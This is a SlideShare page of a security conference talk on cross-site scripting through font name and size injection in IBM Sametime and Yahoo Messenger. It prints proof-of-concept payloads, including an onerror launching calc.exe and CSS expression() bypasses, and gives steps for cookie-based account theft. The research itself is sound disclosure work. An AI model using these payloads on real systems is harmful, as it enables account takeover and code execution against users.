SlideShare a Scribd company logo
© 2012 IBM Corporation
IBM Security Systems
1© 2012 IBM Corporation
Stylish XSS
via Font Name Injection
© 2012 IBM Corporation
IBM Security Systems
2
Background - Instant Messengers
© 2012 IBM Corporation
IBM Security Systems
3
Background - Instant Messengers
<Text Style="
font-family:Segoe UI;
font-weight:bold;
font-style:italic;
color:#008000;
">Hi!</Text>
© 2012 IBM Corporation
IBM Security Systems
4
Background - Instant Messengers
Every time I’ve seen this screen, I wondered
“What if I could use some HTML here…”
© 2012 IBM Corporation
IBM Security Systems
5
Background - Windows Fonts
Windows accepts basically any character as
part of the font name
Font name length limited to ~30 chars
© 2012 IBM Corporation
IBM Security Systems
6
IBM Lotus SameTime Messenger
<span style="font-size:14pt;font-family:Segoe UI;
font-weight:normal;font-style:normal;">You Do!</span>
© 2012 IBM Corporation
IBM Security Systems
7
SameTime - Exploit - CSS
Font Name: expression(alert(1));
© 2012 IBM Corporation
IBM Security Systems
8
SameTime - Exploit - CSS
Font Name: expression(alert(1));
Desired output:
<span style= ";font-family:expression(alert(1));…">
Actual output:
<span style="">
© 2012 IBM Corporation
IBM Security Systems
9
SameTime - Exploit - New Attribute
Font Name: "onclick="alert(1)"
Desired output:
<span style="font-size:9pt;font-family:“
onclick="alert(1)" ...">
Actual output:
<span style="font-size:9pt;font-family:"
onclick="">
© 2012 IBM Corporation
IBM Security Systems
10
SameTime - Exploit
~50 Fonts Later
© 2012 IBM Corporation
IBM Security Systems
11
SameTime - Exploit - Found
Message sent:
<span style=“…font-family:
Message Received:
<span style=“…font-family:
© 2012 IBM Corporation
IBM Security Systems
12
SameTime - Exploit - Found
Message sent:
<span style=“…font-family:e0”
<<style<style</style>img x='>
Message Received:
<span style=“…font-family:
© 2012 IBM Corporation
IBM Security Systems
13
SameTime - Exploit - Found
Message sent:
<span style=“…font-family:e0”
<<style<style</style>img x='>
Message Received:
<span style=“…font-family:e0”>
<img x='>
© 2012 IBM Corporation
IBM Security Systems
14
SameTime - Exploit - Found
Message sent:
<span style=“…font-family:e0”
<<style<style</style>img x='>Rest of Orig CSS">
Message Received:
<span style=“…font-family:e0”>
<img x='>Rest of Orig CSS">
© 2012 IBM Corporation
IBM Security Systems
15
SameTime - Exploit - Found
Message sent:
<span style=“…font-family:e0”
<<style<style</style>img x='>Rest of Orig CSS">'
src='x'
onerror='location="c:windowssystem32calc.exe" '
Message Received:
<span style=“…font-family:e0”>
<img x='>Rest of Orig CSS">
© 2012 IBM Corporation
IBM Security Systems
16
SameTime - Exploit - Found
Message sent:
<span style=“…font-family:e0”
<<style<style</style>img x='>Rest of Orig CSS">'
src='x'
onerror='location="c:windowssystem32calc.exe" '
</span>
Message Received:
<span style=“…font-family:e0”>
<img x='>Rest of Orig CSS">'
src='x'
onerror='location="c:windowssystem32calc.exe" '
</span>
© 2012 IBM Corporation
IBM Security Systems
17
SameTime – Remote Code Execution
<span style="font-size:14pt;font-family:e0">
<img x=';font-weight:normal;font-style:normal;">' src='x'
onerror='location="c:windowssystem32calc.exe"'</span>
© 2012 IBM Corporation
IBM Security Systems
18
Yahoo Messenger
© 2012 IBM Corporation
IBM Security Systems
19
Yahoo Messenger – Message View
Lots of Colors, but that’s about it…
© 2012 IBM Corporation
IBM Security Systems
20
Yahoo Messenger - History View
© 2012 IBM Corporation
IBM Security Systems
21
Yahoo Messenger - History View
© 2012 IBM Corporation
IBM Security Systems
22
Yahoo Messenger - History View
Finally, Yahoo's
purple alert!
© 2012 IBM Corporation
IBM Security Systems
23
Yahoo Messenger - The Payload
<img src="x"onmouseover="alert(1)">
© 2012 IBM Corporation
IBM Security Systems
24
Yahoo Messenger - Digging Deeper
Wait, what?
It's not local?!
© 2012 IBM Corporation
IBM Security Systems
25
Yahoo Messenger - Digging Deeper
Accessing this URL in Chrome, yields the same
result.
© 2012 IBM Corporation
IBM Security Systems
26
Yahoo Messenger - Digging Deeper
That means I can read the cookie!
And steal your account!
© 2012 IBM Corporation
IBM Security Systems
27
Yahoo Messenger - Recap
1. Send the victim a message that contain malicious
HTML snippet
2. Wait 3-4 hours for it to show up in the history
3. Convince the user to access his history or send him
a direct link to it (after all, it not local)
4. Have the victim click the Instant Message from the
drop-down box
© 2012 IBM Corporation
IBM Security Systems
28
Yahoo Messenger - Introducing: Web Messenger!
Finally I can see the results of my attacks in
real time!
© 2012 IBM Corporation
IBM Security Systems
29
Yahoo Messenger - Web Messenger
During the tests, I noticed that a <Font> tag
sent as part of the message text, is being
rendered differently in the Web Messenger.
• The message:
<font face="xxx" size="20">33333</font>
• Was rendered as:
<font style="font-size:20pt" face="xxx“
id="yui_3_2_0_20_1330267588862427">33333</font>
© 2012 IBM Corporation
IBM Security Systems
30
Yahoo Messenger - Exploiting CSS
Add a new rule with an expression() call.
© 2012 IBM Corporation
IBM Security Systems
31
Yahoo Messenger - Exploiting CSS
Started With:
<font face=ssss size="1&color:red">xxxx</font>
To my surprise the response came back as I hoped
<font style="font-size:1&amp;color:red" >xxxx</font>
© 2012 IBM Corporation
IBM Security Systems
32
Yahoo Messenger - Exploiting CSS
Next was the expression:
<font face=sssss size="1&color:expression(alert(1))"
>xxxx</font>
And again, it seems like nothing is filtering this...
<font style="font-size:1&amp;color:expression(alert(1))"
>xxxx</font>
© 2012 IBM Corporation
IBM Security Systems
33
Yahoo Messenger - Exploiting CSS
Time to open Internet Explorer!
© 2012 IBM Corporation
IBM Security Systems
34
Yahoo Web Messenger - IE Version
© 2012 IBM Corporation
IBM Security Systems
35
Yahoo Web Messenger - IE Version
The Rules (for IE):
1. The Size attribute must be surrounded by
double-quotes (" ")
2. The size value must be followed by the "pt;"
suffix
<font size="15pt;"> <font style="font-size=15pt;">
© 2012 IBM Corporation
IBM Security Systems
36
Yahoo Web Messenger - IE Version
By tweaking the size value,
a new Font-Family CSS rule could be injected.
<font size="15pt;font-family:aaaa;">
<font style="font-size=15pt;font-family: aaaa;">
© 2012 IBM Corporation
IBM Security Systems
37
Yahoo Web Messenger - IE Version
With all that in mind, and ~30 <Font> tags later,
came the following payload that bypass the
CSS filtering
<font size="15pt;font-family:expression(alert(1));">
© 2012 IBM Corporation
IBM Security Systems
38
Yahoo Web Messenger - IE Version
It should work correctly according to the rendered source in
IE Developer Tools
© 2012 IBM Corporation
IBM Security Systems
39
Yahoo Web Messenger - IE Version
Yet somehow, no alert
© 2012 IBM Corporation
IBM Security Systems
40
Yahoo Web Messenger - Uber Meta!
After ~5 hours of more fiddling and long lonely IM chats
with myself
I finally found out what I was afraid of.
Or in other words, The "No Expression For You" Meta Tag
<meta http-equiv="X-UA-Compatible" content="IE=8"/>
© 2012 IBM Corporation
IBM Security Systems
41
Yahoo Web Messenger - Going Old School
Fired up my Windows XP VM
and kicked out IE8
© 2012 IBM Corporation
IBM Security Systems
42
Yahoo Web Messenger - Finally
© 2012 IBM Corporation
IBM Security Systems
43
Yahoo Messenger - History Window
© 2012 IBM Corporation
IBM Security Systems
44
Questions?

More Related Content

What's hot

Gestion comptes bancaires Spring boot
Gestion comptes bancaires Spring bootGestion comptes bancaires Spring boot
Gestion comptes bancaires Spring boot
Abdelhakim HADI ALAOUI
 
Airline Reservation system(project report of six week training)-ppt
Airline Reservation system(project report of six week training)-pptAirline Reservation system(project report of six week training)-ppt
Airline Reservation system(project report of six week training)-ppt
Punjab technical University
 
Support developpement applications mobiles avec ionic v3 et v4
Support developpement applications mobiles avec ionic v3 et v4Support developpement applications mobiles avec ionic v3 et v4
Support developpement applications mobiles avec ionic v3 et v4
ENSET, Université Hassan II Casablanca
 
Rapport application web (Spring BOOT,angular4) et mobile(ionc3) gestion des a...
Rapport application web (Spring BOOT,angular4) et mobile(ionc3) gestion des a...Rapport application web (Spring BOOT,angular4) et mobile(ionc3) gestion des a...
Rapport application web (Spring BOOT,angular4) et mobile(ionc3) gestion des a...
MOHAMMED MOURADI
 
Green Software and Green Software Engineering - Definitions, Measurements, an...
Green Software and Green Software Engineering - Definitions, Measurements, an...Green Software and Green Software Engineering - Definitions, Measurements, an...
Green Software and Green Software Engineering - Definitions, Measurements, an...
green-soft
 
Un exemple élémentaire d'application MVC en PHP
Un exemple élémentaire d'application MVC en PHPUn exemple élémentaire d'application MVC en PHP
Un exemple élémentaire d'application MVC en PHP
Kristen Le Liboux
 
Personality Prediction and CV Analysis System
Personality Prediction and CV Analysis SystemPersonality Prediction and CV Analysis System
Personality Prediction and CV Analysis System
IRJET Journal
 
Automated Car Rental System
Automated Car Rental SystemAutomated Car Rental System
Automated Car Rental System
Sohom Ghosh
 
11.project online library management system
11.project online library management system11.project online library management system
11.project online library management system
monika ahalawat
 
Support de cours entrepise java beans ejb m.youssfi
Support de cours entrepise java beans ejb m.youssfiSupport de cours entrepise java beans ejb m.youssfi
Support de cours entrepise java beans ejb m.youssfi
ENSET, Université Hassan II Casablanca
 
ERP ( College Management System)
ERP ( College Management System)ERP ( College Management System)
ERP ( College Management System)
Pranav Jha
 
Student information system project report
Student information system project reportStudent information system project report
Student information system project report
Suman Chandra
 
02 - [ASP.NET Core] ASP.NET Core MVC
02 - [ASP.NET Core] ASP.NET Core MVC 02 - [ASP.NET Core] ASP.NET Core MVC
02 - [ASP.NET Core] ASP.NET Core MVC
Cellenza
 
Normalisation des exigences système / logiciel
Normalisation des exigences système / logicielNormalisation des exigences système / logiciel
Normalisation des exigences système / logiciel
Pierre
 
Développement d'un site web jee de e commerce basé sur spring (m.youssfi)
Développement d'un site web jee de e commerce basé sur spring (m.youssfi)Développement d'un site web jee de e commerce basé sur spring (m.youssfi)
Développement d'un site web jee de e commerce basé sur spring (m.youssfi)
ENSET, Université Hassan II Casablanca
 
E-Ticketing System for public transport
E-Ticketing System  for  public transportE-Ticketing System  for  public transport
E-Ticketing System for public transport
Iliyas Khan
 
Cours java v1.4
Cours java v1.4Cours java v1.4
Cours java v1.4
Mohamed Lahmer
 
Student management system
Student management systemStudent management system
Student management system
Annu Venkata Nagarjuna
 
Student Management System report
Student Management System reportStudent Management System report
Student Management System report
Chandresh Prasad
 
POO en C++
POO en C++POO en C++
POO en C++
elharraj
 

What's hot (20)

Gestion comptes bancaires Spring boot
Gestion comptes bancaires Spring bootGestion comptes bancaires Spring boot
Gestion comptes bancaires Spring boot
 
Airline Reservation system(project report of six week training)-ppt
Airline Reservation system(project report of six week training)-pptAirline Reservation system(project report of six week training)-ppt
Airline Reservation system(project report of six week training)-ppt
 
Support developpement applications mobiles avec ionic v3 et v4
Support developpement applications mobiles avec ionic v3 et v4Support developpement applications mobiles avec ionic v3 et v4
Support developpement applications mobiles avec ionic v3 et v4
 
Rapport application web (Spring BOOT,angular4) et mobile(ionc3) gestion des a...
Rapport application web (Spring BOOT,angular4) et mobile(ionc3) gestion des a...Rapport application web (Spring BOOT,angular4) et mobile(ionc3) gestion des a...
Rapport application web (Spring BOOT,angular4) et mobile(ionc3) gestion des a...
 
Green Software and Green Software Engineering - Definitions, Measurements, an...
Green Software and Green Software Engineering - Definitions, Measurements, an...Green Software and Green Software Engineering - Definitions, Measurements, an...
Green Software and Green Software Engineering - Definitions, Measurements, an...
 
Un exemple élémentaire d'application MVC en PHP
Un exemple élémentaire d'application MVC en PHPUn exemple élémentaire d'application MVC en PHP
Un exemple élémentaire d'application MVC en PHP
 
Personality Prediction and CV Analysis System
Personality Prediction and CV Analysis SystemPersonality Prediction and CV Analysis System
Personality Prediction and CV Analysis System
 
Automated Car Rental System
Automated Car Rental SystemAutomated Car Rental System
Automated Car Rental System
 
11.project online library management system
11.project online library management system11.project online library management system
11.project online library management system
 
Support de cours entrepise java beans ejb m.youssfi
Support de cours entrepise java beans ejb m.youssfiSupport de cours entrepise java beans ejb m.youssfi
Support de cours entrepise java beans ejb m.youssfi
 
ERP ( College Management System)
ERP ( College Management System)ERP ( College Management System)
ERP ( College Management System)
 
Student information system project report
Student information system project reportStudent information system project report
Student information system project report
 
02 - [ASP.NET Core] ASP.NET Core MVC
02 - [ASP.NET Core] ASP.NET Core MVC 02 - [ASP.NET Core] ASP.NET Core MVC
02 - [ASP.NET Core] ASP.NET Core MVC
 
Normalisation des exigences système / logiciel
Normalisation des exigences système / logicielNormalisation des exigences système / logiciel
Normalisation des exigences système / logiciel
 
Développement d'un site web jee de e commerce basé sur spring (m.youssfi)
Développement d'un site web jee de e commerce basé sur spring (m.youssfi)Développement d'un site web jee de e commerce basé sur spring (m.youssfi)
Développement d'un site web jee de e commerce basé sur spring (m.youssfi)
 
E-Ticketing System for public transport
E-Ticketing System  for  public transportE-Ticketing System  for  public transport
E-Ticketing System for public transport
 
Cours java v1.4
Cours java v1.4Cours java v1.4
Cours java v1.4
 
Student management system
Student management systemStudent management system
Student management system
 
Student Management System report
Student Management System reportStudent Management System report
Student Management System report
 
POO en C++
POO en C++POO en C++
POO en C++
 

Viewers also liked

Expedited Removal Article_NM
Expedited Removal Article_NMExpedited Removal Article_NM
Expedited Removal Article_NM
Nicholas Merlin
 
Peluasan kuasa British melalui perjanjian terhadap negeri-negeri melayu
Peluasan kuasa British melalui perjanjian terhadap negeri-negeri melayuPeluasan kuasa British melalui perjanjian terhadap negeri-negeri melayu
Peluasan kuasa British melalui perjanjian terhadap negeri-negeri melayu
Miz Jaye
 
BICSI NEC ARTICLE
BICSI NEC ARTICLEBICSI NEC ARTICLE
BICSI NEC ARTICLE
Santiago Beron, RCDD, CTS-D
 
rbusinessreport
rbusinessreportrbusinessreport
rbusinessreport
mirajuwita
 
SECURITY SYSTEM INTEGRATION
SECURITY SYSTEM INTEGRATIONSECURITY SYSTEM INTEGRATION
SECURITY SYSTEM INTEGRATION
Santiago Beron, RCDD, CTS-D
 
NewMetricsforCCTV_edited
NewMetricsforCCTV_editedNewMetricsforCCTV_edited
NewMetricsforCCTV_edited
Santiago Beron, RCDD, CTS-D
 
CIRCLES OF COVERAGE FOR TELECOM ROOMS
CIRCLES OF COVERAGE FOR TELECOM ROOMSCIRCLES OF COVERAGE FOR TELECOM ROOMS
CIRCLES OF COVERAGE FOR TELECOM ROOMS
Santiago Beron, RCDD, CTS-D
 
Untitled Presentation
Untitled PresentationUntitled Presentation
Untitled Presentation
bnoon14700
 
AV system and lighting controls integration
AV system and lighting controls integrationAV system and lighting controls integration
AV system and lighting controls integration
Santiago Beron, RCDD, CTS-D
 
حب الوطن من الايمان
حب الوطن من الايمانحب الوطن من الايمان
حب الوطن من الايمان
bnoon14700
 
Syarikat multinasional
Syarikat multinasionalSyarikat multinasional
Syarikat multinasional
Miz Jaye
 
Ensayo
Ensayo Ensayo

Viewers also liked (13)

Expedited Removal Article_NM
Expedited Removal Article_NMExpedited Removal Article_NM
Expedited Removal Article_NM
 
Peluasan kuasa British melalui perjanjian terhadap negeri-negeri melayu
Peluasan kuasa British melalui perjanjian terhadap negeri-negeri melayuPeluasan kuasa British melalui perjanjian terhadap negeri-negeri melayu
Peluasan kuasa British melalui perjanjian terhadap negeri-negeri melayu
 
BICSI NEC ARTICLE
BICSI NEC ARTICLEBICSI NEC ARTICLE
BICSI NEC ARTICLE
 
hjm
hjmhjm
hjm
 
rbusinessreport
rbusinessreportrbusinessreport
rbusinessreport
 
SECURITY SYSTEM INTEGRATION
SECURITY SYSTEM INTEGRATIONSECURITY SYSTEM INTEGRATION
SECURITY SYSTEM INTEGRATION
 
NewMetricsforCCTV_edited
NewMetricsforCCTV_editedNewMetricsforCCTV_edited
NewMetricsforCCTV_edited
 
CIRCLES OF COVERAGE FOR TELECOM ROOMS
CIRCLES OF COVERAGE FOR TELECOM ROOMSCIRCLES OF COVERAGE FOR TELECOM ROOMS
CIRCLES OF COVERAGE FOR TELECOM ROOMS
 
Untitled Presentation
Untitled PresentationUntitled Presentation
Untitled Presentation
 
AV system and lighting controls integration
AV system and lighting controls integrationAV system and lighting controls integration
AV system and lighting controls integration
 
حب الوطن من الايمان
حب الوطن من الايمانحب الوطن من الايمان
حب الوطن من الايمان
 
Syarikat multinasional
Syarikat multinasionalSyarikat multinasional
Syarikat multinasional
 
Ensayo
Ensayo Ensayo
Ensayo
 

Similar to Stylish XSS

Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safe
Jeremiah Grossman
 
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
CODE BLUE
 
Layer7-WebServices-Hacking-and-Hardening.pdf
Layer7-WebServices-Hacking-and-Hardening.pdfLayer7-WebServices-Hacking-and-Hardening.pdf
Layer7-WebServices-Hacking-and-Hardening.pdf
distortdistort
 
Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)
Peter Sabev
 
Usb hack
Usb hackUsb hack
Usb hack
Gusnar Syafaren
 
eXploitable Markup Language
eXploitable Markup LanguageeXploitable Markup Language
eXploitable Markup Language
sghctoma
 
Google chrome sandbox
Google chrome sandboxGoogle chrome sandbox
Google chrome sandbox
Nephi Johnson
 
Securing your web applications in CF 2016
Securing your web applications in CF 2016Securing your web applications in CF 2016
Securing your web applications in CF 2016
Pavan Kumar
 
Building high performing web pages
Building high performing web pagesBuilding high performing web pages
Building high performing web pages
Nilesh Bafna
 
Layer 7 Technologies: Web Services Hacking And Hardening
Layer 7 Technologies: Web Services Hacking And HardeningLayer 7 Technologies: Web Services Hacking And Hardening
Layer 7 Technologies: Web Services Hacking And Hardening
CA API Management
 
Malware analysis
Malware analysisMalware analysis
Malware analysis
Den Iir
 
XCS110_All_Slides.pdf
XCS110_All_Slides.pdfXCS110_All_Slides.pdf
XCS110_All_Slides.pdf
ssuser01066a
 
What's new in Xamarin.Forms?
What's new in Xamarin.Forms?What's new in Xamarin.Forms?
What's new in Xamarin.Forms?
James Montemagno
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
Brad Hill
 
Thug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclientThug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclient
Angelo Dell'Aera
 
Hacking_PPT
Hacking_PPT Hacking_PPT
Hacking_PPT
Gaurav Gautam
 
Being HAPI! Reverse Proxying on Purpose
Being HAPI! Reverse Proxying on PurposeBeing HAPI! Reverse Proxying on Purpose
Being HAPI! Reverse Proxying on Purpose
Aman Kohli
 
Build, migrate and deploy apps for any environment with project Hammr , OW2co...
Build, migrate and deploy apps for any environment with project Hammr , OW2co...Build, migrate and deploy apps for any environment with project Hammr , OW2co...
Build, migrate and deploy apps for any environment with project Hammr , OW2co...
OW2
 
AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...
AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...
AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...
Carl Tyler
 
Best Practices & Lessons Learned from the field on EMC Documentum xCP 2.0
Best Practices & Lessons Learned from the field on EMC Documentum xCP 2.0Best Practices & Lessons Learned from the field on EMC Documentum xCP 2.0
Best Practices & Lessons Learned from the field on EMC Documentum xCP 2.0
Haytham Ghandour
 

Similar to Stylish XSS (20)

Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safe
 
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
 
Layer7-WebServices-Hacking-and-Hardening.pdf
Layer7-WebServices-Hacking-and-Hardening.pdfLayer7-WebServices-Hacking-and-Hardening.pdf
Layer7-WebServices-Hacking-and-Hardening.pdf
 
Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)
 
Usb hack
Usb hackUsb hack
Usb hack
 
eXploitable Markup Language
eXploitable Markup LanguageeXploitable Markup Language
eXploitable Markup Language
 
Google chrome sandbox
Google chrome sandboxGoogle chrome sandbox
Google chrome sandbox
 
Securing your web applications in CF 2016
Securing your web applications in CF 2016Securing your web applications in CF 2016
Securing your web applications in CF 2016
 
Building high performing web pages
Building high performing web pagesBuilding high performing web pages
Building high performing web pages
 
Layer 7 Technologies: Web Services Hacking And Hardening
Layer 7 Technologies: Web Services Hacking And HardeningLayer 7 Technologies: Web Services Hacking And Hardening
Layer 7 Technologies: Web Services Hacking And Hardening
 
Malware analysis
Malware analysisMalware analysis
Malware analysis
 
XCS110_All_Slides.pdf
XCS110_All_Slides.pdfXCS110_All_Slides.pdf
XCS110_All_Slides.pdf
 
What's new in Xamarin.Forms?
What's new in Xamarin.Forms?What's new in Xamarin.Forms?
What's new in Xamarin.Forms?
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
Thug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclientThug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclient
 
Hacking_PPT
Hacking_PPT Hacking_PPT
Hacking_PPT
 
Being HAPI! Reverse Proxying on Purpose
Being HAPI! Reverse Proxying on PurposeBeing HAPI! Reverse Proxying on Purpose
Being HAPI! Reverse Proxying on Purpose
 
Build, migrate and deploy apps for any environment with project Hammr , OW2co...
Build, migrate and deploy apps for any environment with project Hammr , OW2co...Build, migrate and deploy apps for any environment with project Hammr , OW2co...
Build, migrate and deploy apps for any environment with project Hammr , OW2co...
 
AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...
AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...
AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...
 
Best Practices & Lessons Learned from the field on EMC Documentum xCP 2.0
Best Practices & Lessons Learned from the field on EMC Documentum xCP 2.0Best Practices & Lessons Learned from the field on EMC Documentum xCP 2.0
Best Practices & Lessons Learned from the field on EMC Documentum xCP 2.0
 

Recently uploaded

Northern Engraving | Nameplate Manufacturing Process - 2024
Northern Engraving | Nameplate Manufacturing Process - 2024Northern Engraving | Nameplate Manufacturing Process - 2024
Northern Engraving | Nameplate Manufacturing Process - 2024
Northern Engraving
 
Freshworks Rethinks NoSQL for Rapid Scaling & Cost-Efficiency
Freshworks Rethinks NoSQL for Rapid Scaling & Cost-EfficiencyFreshworks Rethinks NoSQL for Rapid Scaling & Cost-Efficiency
Freshworks Rethinks NoSQL for Rapid Scaling & Cost-Efficiency
ScyllaDB
 
Harnessing the Power of NLP and Knowledge Graphs for Opioid Research
Harnessing the Power of NLP and Knowledge Graphs for Opioid ResearchHarnessing the Power of NLP and Knowledge Graphs for Opioid Research
Harnessing the Power of NLP and Knowledge Graphs for Opioid Research
Neo4j
 
Programming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup SlidesProgramming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup Slides
Zilliz
 
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAUHCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
panagenda
 
Taking AI to the Next Level in Manufacturing.pdf
Taking AI to the Next Level in Manufacturing.pdfTaking AI to the Next Level in Manufacturing.pdf
Taking AI to the Next Level in Manufacturing.pdf
ssuserfac0301
 
Principle of conventional tomography-Bibash Shahi ppt..pptx
Principle of conventional tomography-Bibash Shahi ppt..pptxPrinciple of conventional tomography-Bibash Shahi ppt..pptx
Principle of conventional tomography-Bibash Shahi ppt..pptx
BibashShahi
 
“Temporal Event Neural Networks: A More Efficient Alternative to the Transfor...
“Temporal Event Neural Networks: A More Efficient Alternative to the Transfor...“Temporal Event Neural Networks: A More Efficient Alternative to the Transfor...
“Temporal Event Neural Networks: A More Efficient Alternative to the Transfor...
Edge AI and Vision Alliance
 
"Choosing proper type of scaling", Olena Syrota
"Choosing proper type of scaling", Olena Syrota"Choosing proper type of scaling", Olena Syrota
"Choosing proper type of scaling", Olena Syrota
Fwdays
 
The Microsoft 365 Migration Tutorial For Beginner.pptx
The Microsoft 365 Migration Tutorial For Beginner.pptxThe Microsoft 365 Migration Tutorial For Beginner.pptx
The Microsoft 365 Migration Tutorial For Beginner.pptx
operationspcvita
 
Y-Combinator seed pitch deck template PP
Y-Combinator seed pitch deck template PPY-Combinator seed pitch deck template PP
Y-Combinator seed pitch deck template PP
c5vrf27qcz
 
Mutation Testing for Task-Oriented Chatbots
Mutation Testing for Task-Oriented ChatbotsMutation Testing for Task-Oriented Chatbots
Mutation Testing for Task-Oriented Chatbots
Pablo Gómez Abajo
 
GNSS spoofing via SDR (Criptored Talks 2024)
GNSS spoofing via SDR (Criptored Talks 2024)GNSS spoofing via SDR (Criptored Talks 2024)
GNSS spoofing via SDR (Criptored Talks 2024)
Javier Junquera
 
What is an RPA CoE? Session 1 – CoE Vision
What is an RPA CoE?  Session 1 – CoE VisionWhat is an RPA CoE?  Session 1 – CoE Vision
What is an RPA CoE? Session 1 – CoE Vision
DianaGray10
 
Columbus Data & Analytics Wednesdays - June 2024
Columbus Data & Analytics Wednesdays - June 2024Columbus Data & Analytics Wednesdays - June 2024
Columbus Data & Analytics Wednesdays - June 2024
Jason Packer
 
“How Axelera AI Uses Digital Compute-in-memory to Deliver Fast and Energy-eff...
“How Axelera AI Uses Digital Compute-in-memory to Deliver Fast and Energy-eff...“How Axelera AI Uses Digital Compute-in-memory to Deliver Fast and Energy-eff...
“How Axelera AI Uses Digital Compute-in-memory to Deliver Fast and Energy-eff...
Edge AI and Vision Alliance
 
HCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAUHCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAU
panagenda
 
GraphRAG for LifeSciences Hands-On with the Clinical Knowledge Graph
GraphRAG for LifeSciences Hands-On with the Clinical Knowledge GraphGraphRAG for LifeSciences Hands-On with the Clinical Knowledge Graph
GraphRAG for LifeSciences Hands-On with the Clinical Knowledge Graph
Neo4j
 
Overcoming the PLG Trap: Lessons from Canva's Head of Sales & Head of EMEA Da...
Overcoming the PLG Trap: Lessons from Canva's Head of Sales & Head of EMEA Da...Overcoming the PLG Trap: Lessons from Canva's Head of Sales & Head of EMEA Da...
Overcoming the PLG Trap: Lessons from Canva's Head of Sales & Head of EMEA Da...
saastr
 
zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...
zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...
zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...
Alex Pruden
 

Recently uploaded (20)

Northern Engraving | Nameplate Manufacturing Process - 2024
Northern Engraving | Nameplate Manufacturing Process - 2024Northern Engraving | Nameplate Manufacturing Process - 2024
Northern Engraving | Nameplate Manufacturing Process - 2024
 
Freshworks Rethinks NoSQL for Rapid Scaling & Cost-Efficiency
Freshworks Rethinks NoSQL for Rapid Scaling & Cost-EfficiencyFreshworks Rethinks NoSQL for Rapid Scaling & Cost-Efficiency
Freshworks Rethinks NoSQL for Rapid Scaling & Cost-Efficiency
 
Harnessing the Power of NLP and Knowledge Graphs for Opioid Research
Harnessing the Power of NLP and Knowledge Graphs for Opioid ResearchHarnessing the Power of NLP and Knowledge Graphs for Opioid Research
Harnessing the Power of NLP and Knowledge Graphs for Opioid Research
 
Programming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup SlidesProgramming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup Slides
 
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAUHCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
 
Taking AI to the Next Level in Manufacturing.pdf
Taking AI to the Next Level in Manufacturing.pdfTaking AI to the Next Level in Manufacturing.pdf
Taking AI to the Next Level in Manufacturing.pdf
 
Principle of conventional tomography-Bibash Shahi ppt..pptx
Principle of conventional tomography-Bibash Shahi ppt..pptxPrinciple of conventional tomography-Bibash Shahi ppt..pptx
Principle of conventional tomography-Bibash Shahi ppt..pptx
 
“Temporal Event Neural Networks: A More Efficient Alternative to the Transfor...
“Temporal Event Neural Networks: A More Efficient Alternative to the Transfor...“Temporal Event Neural Networks: A More Efficient Alternative to the Transfor...
“Temporal Event Neural Networks: A More Efficient Alternative to the Transfor...
 
"Choosing proper type of scaling", Olena Syrota
"Choosing proper type of scaling", Olena Syrota"Choosing proper type of scaling", Olena Syrota
"Choosing proper type of scaling", Olena Syrota
 
The Microsoft 365 Migration Tutorial For Beginner.pptx
The Microsoft 365 Migration Tutorial For Beginner.pptxThe Microsoft 365 Migration Tutorial For Beginner.pptx
The Microsoft 365 Migration Tutorial For Beginner.pptx
 
Y-Combinator seed pitch deck template PP
